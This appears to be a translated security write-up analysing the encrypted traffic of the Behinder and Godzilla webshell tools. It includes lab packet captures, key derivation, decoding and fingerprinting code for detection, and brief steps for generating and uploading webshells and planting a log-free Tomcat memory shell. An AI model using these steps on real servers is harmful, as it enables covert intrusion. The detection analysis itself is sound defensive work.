Behinder (冰蝎) is a new type of webshell client, developed in Java, that dynamically encrypts its communication traffic.
Behinder's communication can be divided into two phases:
key negotiation
encrypted transmission
1) Phase one: key negotiation
a.php
The attacker requests the server's key via GET;
GET /hackable/uploads/shell.php?pass=300 HTTP/1.1
Once we enter a command, the request method changes to POST
POST /hackable/uploads/shell.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=lsgi7fb09enqcn3svmti4eqbo7; path=/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.129:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 1112
hxx/2GPvW+iHRI+j7FKIjpbHv6JcLQzyNs8uQ1IPDTB2xcS5+oKiaSKujjcZ/uYLEwn6oA8a1YehtGbT9arlXe3LaA0kig9BITcK3iZZKYhjpK0/ziTfTa5CnU3lfrnmCcadnmtgUKyTZDdb93DSqwyGn3cFb7BuIPkdCu6SpLov3+EExlHPbY/+6PiiDIpWGCxzkEIwli6zJiS8fa4fSxYcr/e0viSLVI3eXHAvhcohXLsVbWV5HmZMovp4EHYkcofLdR7fjx+NZbIfBOTZfzbOTOXBRBI2GBEUZG4uzi7s0xeHzUWeKf/n+CjrCs1OgYT893Q5KyRSr9+wn3Gi8JfDYPKCady
b.jsp
A random key is first requested from the server via GET
GET /s.jsp?pass=987 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D89B13E292E0D8D7CD9433522F293EDB; Path=/; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 16
Date: Wed, 18 Nov 2020 12:32:58 GMT
9e39ae1ad6ee9e32 // key returned by the server
Likewise, once a command is entered, the request method becomes POST, just as with PHP
POST /s.jsp HTTP/1.1
Content-Type: application/octet-stream
Cookie: JSESSIONID=D89B13E292E0D8D7CD9433522F293EDB; Path=/; HttpOnly
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 8556
75Zv64K/CymLAnv5UhDhKfJdj58rU1o/0yZ7D0XlJU7MgTbzaA4zrvImnNs1Y1cmNPGAdxaaEaYxvasJSp2sCHk5TPv+fWunDMvZWoBqjcnkHGMYyohZpH1v7OvWcdAZPg7CIL87y9HPc2lydWTiBVspavD0FkRVY7/XmeWw7m/O42+SE28iQSgyLf/
2) The server uses the key
The server uses the upper 16 hex digits of the MD5 of a random number as the key, stores it in the session's $_SESSION variable, and returns the key to the attacker.
3) Decryption
The key obtained from the earlier PHP key-request packet:
95c4e8e4eef4b1ac // key returned by the server
a. Take the request ciphertext
b. Enter the key and the request ciphertext; the decrypted result is base64-encoded
c. Base64-decode it
// Decrypted payload body: it is eval'd inside the shell, where the session is already open
@error_reporting(0);
function main($content)
{
    $result = array();
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode($content);
    $key = $_SESSION['k'];                        // key negotiated in phase one
    echo encrypt(json_encode($result), $key);     // JSON with base64 fields, then encrypted
}
function encrypt($data, $key)
{
    if (!extension_loaded('openssl'))
    {
        // Fallback without openssl: XOR each byte with $key[($i + 1) & 15]
        for ($i = 0; $i < strlen($data); $i++) {
            $data[$i] = $data[$i] ^ $key[$i+1&15];
        }
        return $data;
    }
    else
    {
        return openssl_encrypt($data, "AES128", $key);   // AES-128 with the session key
    }
}
$content = "327c829b-f4d3-41eb-a251-d561e01011ec";
main($content);
4) Summary of characteristics
a. Accept header
Behinder 2's default Accept header value is very distinctive, and it is identical in every phase:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
b. User-Agent header
Behinder has more than ten built-in User-Agent strings and picks one at random each time it connects to the shell. They are all fairly old, which makes them easy to detect, although the UA header can be modified in Burp.
c. Content-Length
Content-Length: 16; a response length of 16 is a characteristic of a Behinder 2 connection.
Compared with Behinder 2, Behinder 3 drops dynamic key retrieval: many WAFs and similar devices have analysed Behinder 2's traffic characteristics, so version 3 removed the dynamic key exchange, and only after the no-dynamic-key interaction fails does it fall back to the regular key-negotiation phase.
<?php
@error_reporting(0);
session_start();
$key = "e45e329feb5d925b";
// This key is the first 16 characters of the 32-character MD5 of the connection password; the default password is rebeyond
$_SESSION['k'] = $key;
As the key generation shows, the first 16 characters of the password's MD5 are used.
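The key derivation just described, together with the openssl-less XOR branch of the decrypted payload above, as an added example in Python (not Behinder's own code and not from the original post). With the key recovered from the shell source or the session, a captured response body can be decoded back to the JSON whose fields are then base64-decoded, which is step 3 on this page. The password "rebeyond" and the content string are taken from the page; the request/response round trip is constructed.

```python
"""Behinder 3 key derivation and the openssl-less XOR branch shown on this page.

Added example, not Behinder's own code: derives the static key from the
connection password and implements the XOR fallback cipher, so a captured
response body can be decoded when the key is known.
"""
import base64
import hashlib
import json


def behinder3_key(password: str) -> str:
    """Behinder 3 key: the first 16 hex characters of md5(password)."""
    return hashlib.md5(password.encode()).hexdigest()[:16]


def xor_codec(data: bytes, key: str) -> bytes:
    """The PHP fallback: $data[$i] ^= $key[($i + 1) & 15]. XOR is its own inverse."""
    k = key.encode()
    if len(k) != 16:
        raise ValueError("Behinder keys are 16 ASCII characters")
    return bytes(b ^ k[(i + 1) & 15] for i, b in enumerate(data))


def build_response(content: str, key: str) -> bytes:
    """Mirror main()/encrypt() from the decrypted payload: JSON with base64 fields, then XOR.
    (PHP's json_encode also escapes "/" as "\\/", which json.loads accepts either way.)"""
    result = {"status": base64.b64encode(b"success").decode(),
              "msg": base64.b64encode(content.encode()).decode()}
    return xor_codec(json.dumps(result, separators=(",", ":")).encode(), key)


def decode_response(wire: bytes, key: str) -> dict:
    """Reverse direction (step 3 on the page): XOR with the key, parse the JSON,
    then base64-decode every field."""
    obj = json.loads(xor_codec(wire, key).decode())
    return {name: base64.b64decode(value).decode() for name, value in obj.items()}


if __name__ == "__main__":
    key = behinder3_key("rebeyond")   # default password -> e45e329feb5d925b
    wire = build_response("327c829b-f4d3-41eb-a251-d561e01011ec", key)   # constructed response
    print(key, decode_response(wire, key))
```

The XOR branch is the one a shell falls back to only when the openssl extension is absent; when openssl is present the body is AES-128 under the same key, and the key derivation is unchanged, so the first function is the part an analyst needs in both cases.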
PHP packet capture
Looking at the packets reveals no obvious characteristic, other than that the requests are POST.
1) The Accept header contains application/xhtml+xml, application/xml and application/signed-exchange; this is a weak characteristic.
2) The UA header is also a weak characteristic. It can be changed in Burp, and the 16 default User-Agent strings built into Behinder 3.0 are all fairly old and rarely seen in real traffic, so it can still serve as a WAF rule characteristic.
POST /hackable/uploads/shell.php HTTP/1.1
Content-Type: text/html;charset=utf-8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.132:777
Connection: keep-alive
Content-Length: 1432
Cookie: PHPSESSID=peimnpkc4hi70akr2seroj6mi2
3Mn1yNMtoZViV5wotQHPJtwwj0F4b2lyToNK7LfdUnN7zmyQFfx/zaiGwUHg+8SlXZemCLBkDIvxiBIGd6bgOEiZtNpn6YmnWiiaCBNbXkC5JWFTARrD8lCOCQ4ZVFjsJFDaAOwzinbqne/oYuNwWjQvKM9ii2RE/b+Gc+ya2f4+OIDU2Wk/QSIL7GOAoyaUYZSq4bL2wmX5RnP1Lbf7S+TAy3K7JPruBiZeZGC/ay14vUj4+IgmNHwEAzWl3DNIsL1yhH4Do5FI8HwZpG5XnrZwpKdFIEgN4GKmcDODTdO2pj8DVXCwes3m+v/wRykVd++xsex2EkGn9p0SgL+GpXlGg6Ol
JSP packet capture
Characteristic analysis: Content-Type: application/octet-stream is a strong characteristic. Consulting the documentation, octet-stream means the request can only carry a single binary body; if a file is submitted, only one file can be sent, and the back end can accept only one parameter, which must be a stream (or byte array). It is rarely used.
POST /3.jsp HTTP/1.1
Content-Type: application/octet-stream
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Cache-Control: no-cache
Pragma: no-cache
Host: x.x.x.x:888
Connection: keep-alive
Content-Length: 11864
Cookie: JSESSIONID=F063F33F5F8BE2F3C75311C7128E70D1
F1w4ahdSJGUxG3t11sfr6qxbThq9VnL7i6K1/NzHsb0s9eQIfj2qDW/r5OeNJjI0U/BrUp2pHtrtCkdiUeJVIKFzCMSfe8yhEddJFJideje6Eb0dtrHHd9YYaZcxqQL2FFusmCXFICrCh3MsG+BYZHKbNVkWJrsTiu/1VBPV9CBkJzPBO4aH98EBFycyQbpGCHjAPaZmbaIIVWenbm642/xYr85uQ5/K74vlQ9wR5iGLZvyH8WZOF0YpqhxjkApKeShoSGX/C87NiqMTVAB+DcFNf4HaitS1o7Q6kXnUET00L5irn+WdNis2mvNEzr+DGay6LSKKD9kDl6iTKD/1aiXfk5EgH4PfR0/aXCEKTsFW29So6wbhR6u4H3/
Godzilla (哥斯拉) is a webshell management tool built on fully encrypted HTTP traffic. Compared with AntSword (蚁剑) and Behinder, Godzilla has the following advantages:
All shell types bypass every static detection engine on the market
Its encrypted traffic bypasses every traffic WAF on the market
Godzilla's built-in plugins are beyond what Behinder and AntSword offer
(1) Godzilla requires a Java runtime. In cmd, change to the Godzilla directory and run
java -jar Godzilla.jar
A data.db database is then created in the same directory to store its data.
(2) Godzilla's webshells can be generated with custom settings: Manage -> Generate the required webshell. Godzilla supports jsp, php, aspx and other payloads; the Java and C# payloads natively implement AES encryption, while PHP uses XOR encryption.
(3) Upload the generated webshell to the target machine, then add the corresponding URL in Godzilla's target panel.
(1) php_XOR_BASE64
With a proxy set and Burp capturing, the intercepted traffic shows that every request contains "pass=". First packet:
POST /hackable/uploads/base.php HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 23275
Connection: close
pass=KX4nWAFVJ005aWdeUVosCjpuL0k7YApWKGVGfHFTUXg5WDNFOwszSQEDAVVRWjdGKHU3RwBgLEkGRgV5e3cgVCpxP0YBVVBRB3d3WlFZJ0c5bjdcAVEGUgB2BEh%2BXQJeMGMdQAMKN2M
BAmALeE1UWjpuK1wsUjN%2FAVx7RGhzNFwpBFRcBn9YTylIXkJ9Q1F4J2cKVyt7IF4CZmxVeXczVTYGM2Q3CA1pN11GW2taDUQ6bitKOgpYTjlmAFRrWSdJOWE3QAFRK10zZQQCUVo3XyhuFn4hUSBeKnJ0VXt3IFQycS8FAX8nQwAADERRczdGOwQvWAEKN1ICaXxdeW
ASfSBfJFcreyMAJ2BafHFdIFQqdSdJOGAzCABcAVVrWSdJOWI8ADBvVFMBA2deeXM3ATphHXcGb1RTKHJeQn1DUXgFZ1V7JmkRVAdmAFhWcw1FAV8nWQdgI1EAAntUUAcjXwFaXFk7YC9VOXZZS3l3DQQnZwp
XK3sgXgJmbF17YSNeAmEdXDoKNw0CaXsCUU0GXTpYCUc7YC9DOwMMRWhjVFU6WyNKOG8zSQBYVkJ5bBJ9IF8kVyt7IF4qcnRVY3NQQTlxCUkpewVQBml3WlE
Second packet:
POST /hackable/uploads/base.php HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 51
Connection: close
pass=AWEzAAN%2FWFI3XHNGaGBQWDEHPwY4fSQAM2AIDw%3D%3D
(2) php_XOR_RAW
Running the ls and cat commands: although the commands differ, the requests all contain the same bytes:
:•T[6•
L9e
Packet for the ls command
POST /hackable/uploads/g.php HTTP/1.1
Cookie: PHPSESSID=oo9hn9d3uqq7661o3oldu0ojo7;
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 56
Connection: close
:•T[6•
L9e•[aqP•)[T\••O9t
Packet for the cat command
POST /hackable/uploads/g.php HTTP/1.1
Cookie: PHPSESSID=oo9hn9d3uqq7661o3oldu0ojo7;
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 72
Connection: close
:•T[6•
L9e•h•_8D0c+r•}•L6[gYccY
)[T\••O9t
It would be a serious mistake to take these bytes as the characteristic: they are only the characteristic of this particular connection.
(1) java_AES_BASE64
POST /gejs.jsp HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 33035
Connection: close
pass=0%2FMHwbBP6vuX0WyYztOU9DrUPcD0Zwx0KhArobwwHBDld91Y8xrUqPxo40dKoSbGd%2FxDF4yJopsUIHMI8NMfFUl0oxBzWPyMdTmxAntagmMGLGiqB1ckbl5G%2FlapnewWrvhhdqtj0eT2zvUes%2Bg6yhFGVjLstoOdJxkYPY6XB70AeffugDlCkUYAyHyrTymPocUs14sKD5ItAn5147goo9TAdBH0kgSNlxbqxMqTPbgjKljsvC53fFB%2BO5jKUBCBvsCR1W%2FLhPA42qp1e%2Fl0cmUohwSAT3N0s9r%2FzRVlB3lQkXnV895dz48DyPbYjJp%2Bhpf1qFjbCy1o8Zd771ObGbKvWr1O5PZOTNKBu
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=509B4522D1A54112AA93CCAE0311FEFD; Path=/; HttpOnly
Content-Type: text/html
Content-Length: 0
Date: Wed, 18 Nov 2020 15:04:32 GMT
Connection: close
As with the PHP request it contains "pass=", and when the connection is first established the server's response has Content-Length: 0
(2) java_AES_RAW
POST /rwj.jsp HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 23360
Connection: close
Óó•Á°Oêû•Ñl•ÎÓ•ô:Ô=Àôg•t*•+¡¼0••åwÝXó•Ô¨ühãGJ¡&ÆwüC•••¢••s•ðÓ••It£•sXü•u9±•{Z•c•,hª•W$n^FþV©•ì•®øav«cÑäöÎõ•³è:Ê
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1C26762D96A561D4A63BDE104E22930C; Path=/; HttpOnly
Content-Type: text/html
Content-Length: 0
Date: Wed, 18 Nov 2020 15:19:56 GMT
Connection: close
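The traffic characteristics summarised on this page, for Behinder 2 (fixed Accept header, GET ?pass= answered with a 16-byte key), Behinder 3 (application/octet-stream POST as the strong feature, browser-style Accept and old UA as weak features) and Godzilla ("pass=" bodies and an empty response on the first connection), turned into one fingerprinting routine. This is an added example in Python, not code from the original post or from either tool; it parses a raw HTTP request plus its response and reports every matching characteristic, rated strong or weak as the page rates it. The "User-Agent: Java/..." rule for Godzilla is inferred from the captures above rather than stated in the post, and the sample messages are constructed from those captures with bodies shortened.

```python
"""Fingerprint Behinder 2 / Behinder 3 / Godzilla traffic characteristics from this page.

Added example, not from the original post or from the tools. Inputs are raw HTTP
request and response text as a proxy or IDS would see them.
"""
import re

# Accept header sent by Behinder 2 in every phase and by Godzilla's Java client
JAVA_DEFAULT_ACCEPT = "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"


def parse_http(raw: str):
    """Split a raw HTTP message into (start line, lowercase header dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body.strip()


def looks_base64(body: str) -> bool:
    """Non-empty body made only of base64 characters, as in the Behinder POSTs above."""
    return bool(body) and re.fullmatch(r"[A-Za-z0-9+/=]+", body) is not None


def fingerprint(request: str, response: str = "") -> list:
    """Return findings as 'tool:strength:description' strings (empty list = nothing matched)."""
    start, h, body = parse_http(request)
    method, target = start.split(" ")[:2]
    accept, ua, ctype = h.get("accept", ""), h.get("user-agent", ""), h.get("content-type", "")
    resp_len = parse_http(response)[1].get("content-length") if response else None
    findings = []

    if ua.startswith("Java/"):
        # Godzilla: Java runtime UA (inferred from the captures), Java default Accept,
        # Connection: close, "pass=" body, empty response when the connection is established
        findings.append("godzilla:strong:User-Agent is the Java runtime default")
        if accept == JAVA_DEFAULT_ACCEPT:
            findings.append("godzilla:weak:Java default Accept header")
        if body.startswith("pass="):
            findings.append("godzilla:weak:body starts with pass=")
        if h.get("connection", "").lower() == "close":
            findings.append("godzilla:weak:Connection: close on every request")
        if resp_len == "0":
            findings.append("godzilla:weak:Content-Length: 0 response on initial connection")
    elif accept == JAVA_DEFAULT_ACCEPT:
        # Behinder 2: the same fixed Accept from a browser-looking UA; key negotiation is
        # a GET with ?pass= answered by a 16-byte key
        findings.append("behinder2:strong:fixed Accept header in every phase")
        if method == "GET" and "pass=" in target and resp_len == "16":
            findings.append("behinder2:strong:key negotiation: GET ?pass= answered with 16-byte key")
        if method == "POST" and looks_base64(body):
            findings.append("behinder2:weak:POST body is bare base64")

    # JSP shells (seen in both the Behinder 2 and 3 captures): octet-stream POST with base64 body
    if method == "POST" and ctype.startswith("application/octet-stream") and looks_base64(body):
        findings.append("behinder:strong:Content-Type application/octet-stream with base64 body")
    # Behinder 3: browser-style Accept (with signed-exchange) on a base64-only body is weak
    if "application/signed-exchange" in accept and looks_base64(body):
        findings.append("behinder3:weak:browser-style Accept on a base64-only POST body")
    return findings


# Constructed samples: headers as in the captures above, bodies shortened
B2_GET = ("GET /hackable/uploads/shell.php?pass=300 HTTP/1.1\r\n"
          "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1\r\n"
          "Host: 192.168.0.129:777\r\nAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n\r\n")
B2_KEY_RESP = ("HTTP/1.1 200 OK\r\nContent-Type: text/html;charset=ISO-8859-1\r\n"
               "Content-Length: 16\r\n\r\n9e39ae1ad6ee9e32")
B3_JSP_POST = ("POST /3.jsp HTTP/1.1\r\nContent-Type: application/octet-stream\r\n"
               "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\n"
               "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\r\n"
               "Host: x.x.x.x:888\r\n\r\nF1w4ahdSJGUxG3t11sfr6qxbThq9VnL7i6K1/NzHsb0s9eQIfj2qDW/r5OeNJjI0U/")
GZ_POST = ("POST /gejs.jsp HTTP/1.1\r\nUser-Agent: Java/1.8.0_131\r\nHost: 192.168.0.132:555\r\n"
           "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n"
           "Content-type: application/x-www-form-urlencoded\r\nConnection: close\r\n\r\n"
           "pass=0%2FMHwbBP6vuX0WyYztOU9DrUPcD0Zwx0KhArobwwHBDld91Y8xrUqPxo40dKoSbGd")
GZ_RESP = ("HTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\nContent-Type: text/html\r\n"
           "Content-Length: 0\r\nConnection: close\r\n\r\n")
BENIGN = "GET / HTTP/1.1\r\nHost: example.invalid\r\nUser-Agent: curl/7.88.1\r\nAccept: */*\r\n\r\n"

if __name__ == "__main__":
    for name, req, resp in [("behinder2 key request", B2_GET, B2_KEY_RESP),
                            ("behinder3 jsp post", B3_JSP_POST, ""),
                            ("godzilla connect", GZ_POST, GZ_RESP),
                            ("benign", BENIGN, "")]:
        print(name, fingerprint(req, resp))
```

Only the Accept, octet-stream and 16-byte-key rules fire on their own; the rest are weak signals that a rule set should combine (for example a Java UA with a "pass=" body and an empty first response) rather than alert on individually, since the post itself notes that the UA and Accept values are trivially changed in a proxy.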
The memory-shell module implements uploading a Godzilla shell, or a Behinder or China Chopper (菜刀) shell, into Tomcat, and can even upload reGeorg to establish an HTTP tunnel. Here I chose to upload a Behinder shell and then connected to it with Behinder; the connection succeeded. The memory shell leaves no log and disappears once Tomcat restarts.